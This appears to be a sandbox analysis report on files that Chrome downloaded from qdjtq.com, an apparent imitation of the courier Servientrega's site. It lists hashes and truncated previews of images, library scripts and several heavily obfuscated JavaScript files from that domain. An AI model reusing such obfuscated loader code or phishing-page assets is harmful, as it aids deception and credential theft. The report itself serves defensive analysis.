            Preview:.PNG........IHDR.............B......sBIT....|.d.....IDATx...{.]u}...w.\0.....B.%.....*j.s&1E..D.....$ F....y...!.g.I.VA...T`1.2.b...P..B.$$J!..c2s..$`B..;g.}...k-."......;.....I.o.v8......I:....`...+X.fk.a..X..d.:f.... p`.Qd........t..-Q..d...C.\$Y.c\.t..=j0i.{?..c...$.@j..L..MI:..Nc(.O:...5.43.$.A.... .E.FDDb..#"".P....X..~..9xH.8}q.:e....._....e.P.I3s../N.m=.c.#.).;.....4q[v.[d""..5..........B.FDDb..#"".P....X.5.4...#....Y.=....*....D..g...$...j0".........Ko.....s.`.....%....E&".....c..q.....R.5..INGs.cN.1R.}...#...J.FD....&.!e..3...J.FD..%. .>Bg...C.P.I3s-.(......}.W...O..t............\.t........gX1..C....H:5P*.t...D.4.L~.%..h....]...l.L>.BkO!.L.P.I...-E.Cl;Z.6ZzG.......W.,{'.{_.5S.t.LD..\..gU`.x.Y.k.......Q....A.f.R.5...|j0"".hN.f....;7.....{.......1..VOar.c.S&5...Z.....a..e.3.....]N.....f...xw?...r....`%.(..).....K~.t(.I..W?Ig.j.B.NF...q....X;q.....A....P...Lrc.A...o<7.}.Q/.X.t,.I.m..`L..@..I...i..~......-`.%.f$qg.3.n<%.."..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:downloaded
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/socket.io/?EIO=4&transport=polling&t=P8munRy&sid=jnmURHTecJrkHRFxAHuG
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2343)
            Category:dropped
            Size (bytes):52916
            Entropy (8bit):5.51283890397623
            Encrypted:false
            SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
            MD5:575B5480531DA4D14E7453E2016FE0BC
            SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
            SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
            SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
            Malicious:false
            Reputation:low
            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):10409
            Entropy (8bit):4.168738315809581
            Encrypted:false
            SSDEEP:192:gTmKImxGgWXCHGq91oLJ4dmBfLKnxKwKtx5RiTq:gTemxGgWyHniJ4wBjKxdqf
            MD5:C9431F464D2C18B06E2BAC6CAB90E6CC
            SHA1:D51543C649347A27CB91EF56B84BC10EB4C4DC1A
            SHA-256:1E782C52411F41C02095854A610827BA2989E90D95D878C683D32EAE6F4A9AE4
            SHA-512:5F340BEBB6DA879FB1D960341251EFA4BB256441B64A112A268B80911A343E58D1B7031A574A719E0423AC8A87D9366FC176F7515A9D706184AEBE89681BA268
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-logistica.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 30</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-376.000000, -126.000000)">. <g id="Group-13" transform="translate(86.000000, 95.000000)">. <g id="Group-30" transform="translate(290.000000, 31.000000)">. <rect id="Rectangle" fill="#FFFFFF" opacity="0" x="0" y="0" width="43" height="30"></rect>. <g id="Group-6" transform="translate(1.000000, 2.893769)">. <path d="M27.9076983,2.98076217 C27.814557,3.12742011 27.6820671,3.24727504 27.5117229,3.3231326 C27.4927958,3.33172979 27.4743668,3.34184413 27.4564358,3.35246418 C27.4365125,3.35853279 27.4170873,3.36510711 27.3976621,3.3737043 L2
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1717
            Entropy (8bit):5.005651701719216
            Encrypted:false
            SSDEEP:24:2dqAALfE26pkx2jmpByWakQoHKoulC9XtSUXH0XmRBzIVSK60YP4AGpZ:cqAQfE1kxbyWEoqo3sWHLRBzj208Z
            MD5:C39A650483FE20BAC0E3C1B8EBA355C5
            SHA1:D72E540D78FA191487130F839DA06EFC5749AFFC
            SHA-256:AE1FE90F2FC728C0C50E9F3C8B4568A2E768F9CE8EEE009131636AA42004B65F
            SHA-512:5B15E42B649A2383D2F5AD3B8AC1470D69341D0828EB87007FDEC39A342F31EB367A54528FB08D744E9590E220EBD19979CCDE633A995526F47BD40503E866EA
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/uzer-logo.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 26.5.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 865.2 255" style="enable-background:new 0 0 865.2 255;" xml:space="preserve">..<style type="text/css">....st0{fill-rule:evenodd;clip-rule:evenodd;fill:#FFFFFF;}..</style>..<g>...<path id="Combined-Shape" class="st0" d="M138.6,255c-33.4,0-60-9.9-79.7-29.7s-29.5-47-29.5-81.5V73.4c0-7.1-0.7-12.3-2.2-15.7....c-1.6-3.4-4.2-5.1-7.9-5.1c-3.2,0-5.7,0.9-7.4,2.6l-3.7-1.9L0,12.1l2.2-4.2c3.7-2.3,8.6-4.2,14.7-5.7C23,0.8,29.1,0,35.3,0....C52.2,0,65,5.2,74,15.5c8.9,10.3,13.4,25.3,13.4,45v85.9c0,17.4,4.6,31,13.8,40.9c9.2,9.8,21.7,14.8,37.5,14.8s28.4-4.9,37.7-14.8....c9.3-9.8,13.9-23.5,13.9-40.9V4.5h56.9v0.9h206.4v42.4L328.2,202.2H462V5.4h294.2c30.5,0,53.9,6.9,70.1,20.7....c16.3,13.8,24.4,32.9,24.4,57.3c0,16.6-4.6,30.8-13.7,42.8c-
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 192 x 78, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):6858
            Entropy (8bit):7.9220791226157266
            Encrypted:false
            SSDEEP:192:NeafC9/UAxbNMPq2HDWgl/spt0BqG1uWJ7:NZf0/UAEPqo1l/I0UG1u8
            MD5:D7E572B3644E4BE1DC484D7951411EED
            SHA1:9792B3F4CF4AF3648A8ECCD10A6B8521F3B50F34
            SHA-256:B4EC6B7DEF6C3CC50453643C898F2B0113A9376850C733FD99604D8569C09D7B
            SHA-512:797A3F8B098FA5286FE6C8E29C614EC9265290ED9A75F4DA4347E655DB9742551AB25F3C5EE2CAC9B8156796005367394C0AFEE902D5B3E35EF1AB3A75BCC481
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR.......N.....vf......sBIT....|.d.....IDATx..Ys.X...Z.b..1.ml..'v......5]3.s5.i>.\.}/S..I.I.Mb...,6.1f.H...y.i0`.8[7.U.....H:.9.Y....`Ba?......C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&..c...l.....Z...@.4.....8.<..d2.f......t~,..&..C.......#....X,B.ep............o..(C..B.RA...l...E$.A ......b.L8.].J......."X...l..j..j..\.et:.t..B0.8...l..f...,....u..f..$......`..}.l0..7.(..H&..V..4......N......@UUh.F....`..*.Y.X...d. ......@.u8.N...bnn.,k.0..... .2....J...*.f3L&.j..dYF......a..........].(...A .....$I.........../_.D.X....f...1..:5p.........p8 I..f3..<l6....p8...`0.....css...`aa..\.'''.t:.[..\..... .2NOO....[.n.....y'.........v;\..vvv..*...(z......)X.V...!.........`........K...@.$...|>.V......1.m6.fgg...055.....d2}ty.~.\I..........f..R..I../,...t..v..h.....G.v.`,..#...ckk.N...V..R..,....}..vQ.Vqvv...|>.x<.Ie2..0....e.x... .b..P(..j.....(A.Z......q||...2..p..h..D".j..`0...]...!..t:..j...p:.x...g).........b..H$.d2.M.>.\W.a....j....Z..W.^}.-.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (21060)
            Category:downloaded
            Size (bytes):21233
            Entropy (8bit):5.216885202565074
            Encrypted:false
            SSDEEP:384:wnM6G590O7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBS5vISg3gzopL9TidOgHX:55l7X/jD45eSxpOxvKD73S5vTzwL9Tib
            MD5:1022EAF388CC780BCFEB6456157ADB7D
            SHA1:313789CA0E31B654784DBBA8B0F83F364F8683B4
            SHA-256:FE28DC38BC057F6EB11180235BBE458B3295A39B674D889075D3D9A0B5071D9F
            SHA-512:B9BB93F19F3C5B17B3812A9FDD12EE362E659A3B2D8897327B3C77E32214DA0007A27222DBB35AEDAB6ACD46423A8638084C5AA05BA6CCEB054360A1F88FC70B
            Malicious:false
            Reputation:low
            URL:https://unpkg.com/popper.js@1.16.1/dist/umd/popper.min.js
            Preview:/*. Copyright (C) Federico Zivolo 2020. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):858
            Entropy (8bit):5.22367242129071
            Encrypted:false
            SSDEEP:12:TMHd4TOWuYxJnTBnElPuWH73yuQnu0fNkBsdny0mqNVyU9PuWH73yuQnuMgKMwBX:2dKO6xJTIuduV3HCvy2uduVMdMw3DZ
            MD5:3ED87DEB577E4826A3C27B0AF7C0594A
            SHA1:2D2178B537AA3AAB7824611204CFFAADF3532A16
            SHA-256:1A06CB9D03F20562A6F3F81DD40D1635EF7309B1058EFA1F0D8815CF927CA815
            SHA-512:5B476FED238362FCC822D30C74824153C9DDEB90B3298C9EC459F9D2E64D942E0ABDF6D336242D89B913BA145D9F9E9BB1DFD57B0C5FD7565D2BC1EFA0EBD317
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-cta.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="36px" height="28px" viewBox="0 0 36 28" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <desc>Created with Lunacy</desc>.. <defs>.. <path d="M21.6667 0L19.3167 2.37937L28.6167 11.8125L7.77156e-14 11.8125L7.77156e-14 15.1875L28.6167 15.1875L19.3167 24.6206L21.6667 27L35 13.5L21.6667 0Z" id="path_1" />.. <clipPath id="mask_1">.. <use xlink:href="#path_1" />.. </clipPath>.. </defs>.. <g id="ic/arrow_forward" transform="translate(0.5 0.5)">.. <g id="ic/arrow_forward">.. <path d="M21.6667 0L19.3167 2.37937L28.6167 11.8125L7.77156e-14 11.8125L7.77156e-14 15.1875L28.6167 15.1875L19.3167 24.6206L21.6667 27L35 13.5L21.6667 0Z" id="Path" fill="#0072FF" fill-rule="evenodd" stroke="#FFFFFF" stroke-width="1" />.. </g>.. </g>..</svg>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:dropped
            Size (bytes):41
            Entropy (8bit):4.180365114215879
            Encrypted:false
            SSDEEP:3:YGKhIWANmq6LFHYn:YGKhCNU4
            MD5:64E1C1EB9F4CAF0CF0E7484D7AFCEDB9
            SHA1:69E40D8C48A866A84046FD8BD17AF47FF02B79A4
            SHA-256:8ACAC48BC106C4EAE580C08071597F9DAFAB96D959DEFF65BEC44514DA907B1D
            SHA-512:F109767D57E85127D18B1AD2030A48C0EAD69F79A15C4008712407B1F62691654B74C9D6E225FFDC4A922847EABB928DC7520A656C7081B585124CF678B54E59
            Malicious:false
            Reputation:low
            Preview:{"code":1,"message":"Session ID unknown"}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (2091), with no line terminators
            Category:downloaded
            Size (bytes):2091
            Entropy (8bit):5.3076292279705335
            Encrypted:false
            SSDEEP:48:XrkWXFGEwIVGuQUtrEvo6ST7dkVYtNhsf2pcWUQWUUJRURXJp5KpU6d:eIVdQUWtSlkVmsf6cWUQWUUXUni
            MD5:67B2F530F01F7969F86CCF8D63F2C16D
            SHA1:43EFF8A39780ADA1D783FE769C566F2C3288D720
            SHA-256:BC64DA9FA28C95897C942F8805E8B885EDEB77731459D1A9AEABF5D125D279E8
            SHA-512:75283A93E23ACAB3CB9D7C54245BDB473527B416D99E4FFE93F6683A6CAAEA58CA9D7E0D964690EC7CBB84DFF6F24584A50B352C5956521A552505AFBBC249F7
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/09bf01f8ajMSD.js
            Preview:(function(_0x4a747b,_0x4892c3){const _0x4ad91a=a2_0x55a9,_0x2c19f4=_0x4a747b();while(!![]){try{const _0x4cf458=-parseInt(_0x4ad91a(0xbb))/0x1*(parseInt(_0x4ad91a(0xb7))/0x2)+parseInt(_0x4ad91a(0xc4))/0x3*(parseInt(_0x4ad91a(0xbd))/0x4)+-parseInt(_0x4ad91a(0xb4))/0x5+parseInt(_0x4ad91a(0xc3))/0x6+parseInt(_0x4ad91a(0xb3))/0x7*(parseInt(_0x4ad91a(0xbf))/0x8)+-parseInt(_0x4ad91a(0xb5))/0x9+parseInt(_0x4ad91a(0xb9))/0xa;if(_0x4cf458===_0x4892c3)break;else _0x2c19f4['push'](_0x2c19f4['shift']());}catch(_0x599cdd){_0x2c19f4['push'](_0x2c19f4['shift']());}}}(a2_0x121e,0x22524));function a2_0x55a9(_0x2ca606,_0x5d7746){const _0x2ae538=a2_0x121e();return a2_0x55a9=function(_0x3132a9,_0x587dbc){_0x3132a9=_0x3132a9-0xb3;let _0x121eb8=_0x2ae538[_0x3132a9];return _0x121eb8;},a2_0x55a9(_0x2ca606,_0x5d7746);}function a2_0x121e(){const _0x2a0cb8=['16GKPUlk','nofollow\x20n','noopener','click','179586CeViGV','34887JuayGe','remove','createElem','apply','constructo','oreferrer\x20','append','73241UKLdcO','
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):3099
            Entropy (8bit):7.7033789402601105
            Encrypted:false
            SSDEEP:48:d0CNn2rOvrJ3+C4hvYIYzEmFrPecJ4iJMmy1dkAxxJ2op3dZEDO92lHC:h2yAC4t2ESDecJerkJop39928
            MD5:A42EB6FE1E8AF192EC66CD32A2AD2E36
            SHA1:4C3FDFE9ACF0E1D23D05940B97633A23B9AEC573
            SHA-256:9799B3B47A360D72D033780C872DD3A777178E49934233B8377F92C71D21F448
            SHA-512:FF04E7F5FFE3A748E44CABFB9E2468B49DA935201727C2CF5A6165C75BABCE7C38F6B9AF7F1A5037AB728D3AFC8FC278F5CF786D4DA528CBC8859B3D5F2C5966
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/favicon32x32.png
            Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.4 (Windows)" xmpMM:InstanceID="xmp.iid:3A45D12B11AE11EC9750AFFD84A37FFE" xmpMM:DocumentID="xmp.did:3A45D12C11AE11EC9750AFFD84A37FFE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3A45D12911AE11EC9750AFFD84A37FFE" stRef:documentID="xmp.did:3A45D12A11AE11EC9750AFFD84A37FFE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>9.Q.....IDATx.W{pT.......}%.,I.I .....GD(.Q...`.`)#.hm....N.:>@.P,#J.+..2..i.-.$:..i$4b..e.&.f7.......@.....f3..w
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):2828
            Entropy (8bit):4.702208915781906
            Encrypted:false
            SSDEEP:48:cxnxGnsAP/3fUn5XULwkDrtk6UvpUhkzUV2emGcKU8hE:q+/e5XUkkftLMpUhkzUVSGJU8m
            MD5:6F4A7A49589ED8AF694003220991F244
            SHA1:2CBE51B914ED62236DFBF5C4E6D77ED765BE2699
            SHA-256:276101F05F88FC3394CB7515C626053A624413ABC4607AF869E0288AB6E637D5
            SHA-512:339C969ACEB361674FD0B362719021E4197C51B0C461AA4701BEFF9B6B5C6A6F8133CF4216EC9FC6E5F9E4C1219C1559871AF5ECDA32D5627EEF3937013DCF8B
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/60.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="43px" height="30px" viewBox="0 0 43 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>Group 29</title>. <g id="Plantilla-1---Menus-desplegados" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="Menu-Soluciones" transform="translate(-1088.000000, -126.000000)">. <g id="Group-29" transform="translate(1088.000000, 126.000000)">. <g id="Group-6" transform="translate(0.000000, 8.893769)">. <g id="Group-3" fill="#009A44">. <path d="M20.1868332,20.1871639 L18.8322719,20.1871639 L18.8322719,3.68059679 C18.8322719,3.45612296 18.6499437,3.27422175 18.4254735,3.27422175 L2.73234361,3.27422175 C2.50787345,3.27422175 2.32597522,3.45612296 2.32597522,3.68059679 L2.32597522,20.1871639 L0.812736767,20.1871639 L0.812736767,0.812750081 L20.1868332,0.812750081 L20.1868332,20.1871639 Z M3.13871199,7.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
            Category:downloaded
            Size (bytes):113490
            Entropy (8bit):5.304371309532879
            Encrypted:false
            SSDEEP:3072:JbjjTFpkg2LcsIF0FDM4mWVd4qf6rhKMKRzw0TOA9cY2yDaoWh:Fxpk9eS6rhKMKRzw0TOA9cYxDaoI
            MD5:2AA25ED96451C8F5ADA7072889DD1700
            SHA1:0E66FA67FF3D37BD8B7DAB922243C4FCB99B68EB
            SHA-256:C2AC6DEB5148C6B972C1F3F0F2A1650ECF6DC6C870DDFF6E61CF423B45674537
            SHA-512:838DCC4CEC07E79F82A991F3EB7EE1389D0A8A385A7B4356D7988A979BE305791E7789C59663F331469E8FED68F5C7D3EB92956E65888F3191675D5141E06B96
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/assets/d1a234c2ajMSD.js
            Preview:const a31_0x1a5313=a31_0x2ea2;(function(_0x2f75ce,_0x58f7f3){const _0x27f9b5=a31_0x2ea2,_0x4d4eb2=_0x2f75ce();while(!![]){try{const _0x16bc19=-parseInt(_0x27f9b5(0x3f6))/0x1*(parseInt(_0x27f9b5(0x3e6))/0x2)+parseInt(_0x27f9b5(0x20f))/0x3*(-parseInt(_0x27f9b5(0x22b))/0x4)+-parseInt(_0x27f9b5(0x39b))/0x5*(parseInt(_0x27f9b5(0x3a6))/0x6)+-parseInt(_0x27f9b5(0x17a))/0x7+parseInt(_0x27f9b5(0x315))/0x8+parseInt(_0x27f9b5(0x2fd))/0x9*(parseInt(_0x27f9b5(0x247))/0xa)+parseInt(_0x27f9b5(0x15a))/0xb;if(_0x16bc19===_0x58f7f3)break;else _0x4d4eb2['push'](_0x4d4eb2['shift']());}catch(_0x5a74a8){_0x4d4eb2['push'](_0x4d4eb2['shift']());}}}(a31_0x87a9,0x63b28));const a31_0x3db196=(function(){let _0x1420eb=!![];return function(_0x93a44a,_0x1fab17){const _0x461935=_0x1420eb?function(){const _0x198b05=a31_0x2ea2;if(_0x1fab17){const _0x3dc2f9=_0x1fab17[_0x198b05(0x1ab)](_0x93a44a,arguments);return _0x1fab17=null,_0x3dc2f9;}}:function(){};return _0x1420eb=![],_0x461935;};}()),a31_0x34f197=a31_0x3db196(this
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with CRLF line terminators
            Category:downloaded
            Size (bytes):1244
            Entropy (8bit):4.933997063970417
            Encrypted:false
            SSDEEP:24:zAMoOlMkQDlG3SJRWp6sYrCACNiZc8vi3MMBvii6CpmmwArsiiSH2/i3MM/Aiihi:kMoOaFD71zCNiWuicUiiecsiiIuicBi9
            MD5:4B54CFF7858D18604B8F05B2687EB932
            SHA1:ABF566D40867B6D178389E360B39FBE4611D18F9
            SHA-256:B62302BBA0CF7BE5EABB0F5934625BA8FD0212D2C81DD3F4DA577F6CD1638B27
            SHA-512:EB597EEC2AFF93EF81A674152E953ED47202CFAA4DDD63D5EF384676A77699CCEE4A58E605F1C272D1CC5397E1F66AB178DAAB06E8C514557BC050777928D260
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/js/main-HF.js
            Preview:jQuery(document).ready(function($) {.....var stickyOffset = $('.main-menu').offset().top;....$(window).scroll(function(){.. var sticky = $('.main-menu'),.. scroll = $(window).scrollTop();.... if (scroll >= stickyOffset) sticky.addClass('fixed');.. else sticky.removeClass('fixed');..});........ var alterClass = function() {.. var ww = document.body.clientWidth;.. if (ww < 991) {.. $('.menu-container').addClass('offcanvas offcanvas-start').attr("visibility", "visible");.. $('.submenu-collapse').removeClass('show');.. $('.first-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.second-lvl').addClass('collapsed').attr('data-bs-toggle', 'collapse');.. $('.sub-menu-container').addClass('collapse');.... } else if (ww >= 990) {.. $('.menu-container').removeClass('offcanvas offcanvas-start').attr("visibility", "hidden");.. $('.submenu-collapse').addClass('show');.. $('.first-lvl').removeClass('collapsed');... $('.
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:Unicode text, UTF-8 text, with very long lines (65482), with no line terminators
            Category:dropped
            Size (bytes):113490
            Entropy (8bit):5.304371309532879
            Encrypted:false
            SSDEEP:3072:JbjjTFpkg2LcsIF0FDM4mWVd4qf6rhKMKRzw0TOA9cY2yDaoWh:Fxpk9eS6rhKMKRzw0TOA9cYxDaoI
            MD5:2AA25ED96451C8F5ADA7072889DD1700
            SHA1:0E66FA67FF3D37BD8B7DAB922243C4FCB99B68EB
            SHA-256:C2AC6DEB5148C6B972C1F3F0F2A1650ECF6DC6C870DDFF6E61CF423B45674537
            SHA-512:838DCC4CEC07E79F82A991F3EB7EE1389D0A8A385A7B4356D7988A979BE305791E7789C59663F331469E8FED68F5C7D3EB92956E65888F3191675D5141E06B96
            Malicious:false
            Reputation:low
            Preview:const a31_0x1a5313=a31_0x2ea2;(function(_0x2f75ce,_0x58f7f3){const _0x27f9b5=a31_0x2ea2,_0x4d4eb2=_0x2f75ce();while(!![]){try{const _0x16bc19=-parseInt(_0x27f9b5(0x3f6))/0x1*(parseInt(_0x27f9b5(0x3e6))/0x2)+parseInt(_0x27f9b5(0x20f))/0x3*(-parseInt(_0x27f9b5(0x22b))/0x4)+-parseInt(_0x27f9b5(0x39b))/0x5*(parseInt(_0x27f9b5(0x3a6))/0x6)+-parseInt(_0x27f9b5(0x17a))/0x7+parseInt(_0x27f9b5(0x315))/0x8+parseInt(_0x27f9b5(0x2fd))/0x9*(parseInt(_0x27f9b5(0x247))/0xa)+parseInt(_0x27f9b5(0x15a))/0xb;if(_0x16bc19===_0x58f7f3)break;else _0x4d4eb2['push'](_0x4d4eb2['shift']());}catch(_0x5a74a8){_0x4d4eb2['push'](_0x4d4eb2['shift']());}}}(a31_0x87a9,0x63b28));const a31_0x3db196=(function(){let _0x1420eb=!![];return function(_0x93a44a,_0x1fab17){const _0x461935=_0x1420eb?function(){const _0x198b05=a31_0x2ea2;if(_0x1fab17){const _0x3dc2f9=_0x1fab17[_0x198b05(0x1ab)](_0x93a44a,arguments);return _0x1fab17=null,_0x3dc2f9;}}:function(){};return _0x1420eb=![],_0x461935;};}()),a31_0x34f197=a31_0x3db196(this
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (64667)
            Category:downloaded
            Size (bytes):70155
            Entropy (8bit):5.298357028582105
            Encrypted:false
            SSDEEP:1536:bvv9kTaEcNsVonZXYNtWuNscVDXYRClzlIgQXyjXlkaioEFWOqDw6usT5aXsdtkL:mNDNLlzlIgQX28XsYce
            MD5:B4653F3D9E2A19AB2398E865A6C51082
            SHA1:E6EA2F0FD9A7EF8F2D07E790EC60E01F53CA9A53
            SHA-256:94F21A088982EFEFCE534C134C3082AF7CB7B73F58839DC02C70ACC8EE1C3DF0
            SHA-512:B4B92EF68CF1D0D7D2B91CEEBE9047ED2DF1096AF327B7FBE2C224EF04596E2269C4F443DC8EDCF12BFE8606E15CC20545AAEFE9BF63222227E5F219510BE697
            Malicious:false
            Reputation:low
            URL:https://js.hs-analytics.net/analytics/1727397000000/22144436.js
            Preview:/** . * HubSpot Analytics Tracking Code Build Number 1.981. * Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.var _hsq = _hsq || [];._hsq.push(['setTrackingGate', 'AnalyticsTracking:BlockBadIdentities']);._hsq.push(['setPortalId', 22144436]);._hsq.push(['trackPageView']);._hsq.push(['setLegacy', false]);._hsq.push(['addHashedCookieDomain', '224894981']);._hsq.push(['addHashedCookieDomain', '20629287']);._hsq.push(['addHashedCookieDomain', '251652889']);._hsq.push(['addHashedCookieDomain', '146685547']);._hsq.push(['addHashedCookieDomain', '212638539']);._hsq.push(['embedHubSpotScript', 'https://js-na1.hs-scripts.com/22144436.js', 'hs-script-loader']);._hsq.push(['initEventVisualizerScript']);._hsq.push(['setTrackingDomain', 'track.hubspot.com']);./** _anon_wrapper_ **/ (function() {./*! For license information please see hsa-prod.js.LICENSE.txt */.(hstc=hstc||{}).JS_VERSION=1.1;hstc.ANALYTICS_HOST="track.hubspot.com";(hstc=hstc||{}).Math={uuid:function(){if(window.navigator.us
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1917), with no line terminators
            Category:downloaded
            Size (bytes):1917
            Entropy (8bit):5.335902925144818
            Encrypted:false
